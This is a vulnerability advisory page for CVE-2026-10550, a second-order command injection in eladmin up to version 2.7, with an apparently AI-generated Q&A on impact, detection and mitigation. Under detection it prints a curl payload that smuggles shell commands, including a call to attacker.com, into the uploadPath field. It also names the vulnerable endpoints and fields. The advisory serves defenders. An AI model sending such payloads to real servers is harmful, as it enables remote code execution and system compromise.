CVE-2026-10550
Command Injection in Eladmin Application
Publication date: 2026-06-02
Last updated on: 2026-06-02
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| elunez | eladmin | to 2.7 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-77 | The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. |
| CWE-74 | The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-10550 is a second-order stored command injection vulnerability in the elunez_eladmin application, affecting versions up to v2.7. It exists in the application deployment module due to insecure implementation and insufficient input validation.
Low-privileged users with app:add or app:edit permissions can bypass weak prefix validations on configuration fields such as uploadPath by injecting shell metacharacters. These malicious inputs are stored in the database and later executed with high privileges when an administrator or automated pipeline triggers deployment.
The vulnerability arises from unsafe command execution where user inputs are directly concatenated into shell commands and executed via an interactive SSH shell (ChannelShell) without proper sanitization, leading to unauthorized Remote Code Execution (RCE) and privilege escalation.
How can this vulnerability impact me? :
This vulnerability allows an attacker with low-level permissions to inject malicious commands that are later executed with high privileges during deployment.
The impact includes unauthorized Remote Code Execution (RCE), which can lead to full system compromise, privilege escalation, and potentially control over the affected server or environment.
Attackers can exploit this by submitting specially crafted payloads that are stored and later executed, bypassing normal security controls and potentially causing significant damage or data breaches.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring for suspicious POST or PUT requests to the endpoints /api/app and /api/deploy/deploy that include unusual or malicious payloads in JSON fields such as uploadPath, deployPath, backupPath, startScript, and deployScript.
Specifically, detection can focus on identifying payloads containing shell metacharacters or command injection patterns, such as newlines or command substitution sequences.
Example commands to detect exploitation attempts include searching server logs or network traffic for POST requests with suspicious payloads like:
- curl -X POST http://<target>/api/app -H 'Content-Type: application/json' -d '{"uploadPath": "/opt/apps\nwhoami\ncurl attacker.com"}'
Additionally, monitoring for unexpected command executions triggered by deployment processes or unusual SSH ChannelShell activity may help detect exploitation.
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting or disabling the ability of low-privileged users to submit or edit application deployment configurations, especially fields like uploadPath, deployPath, backupPath, startScript, and deployScript.
Implement strict input validation and sanitization on these fields to prevent injection of shell metacharacters or command sequences.
Avoid direct string concatenation of user inputs into shell commands and use safer command execution methods that do not invoke a shell or properly escape inputs.
Monitor and audit deployment triggers and related SSH shell executions for suspicious activity.
If possible, apply patches or updates from the vendor once available, or consider disabling the vulnerable deployment features until a fix is released.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The provided information does not specify any direct impact of this vulnerability on compliance with common standards and regulations such as GDPR or HIPAA.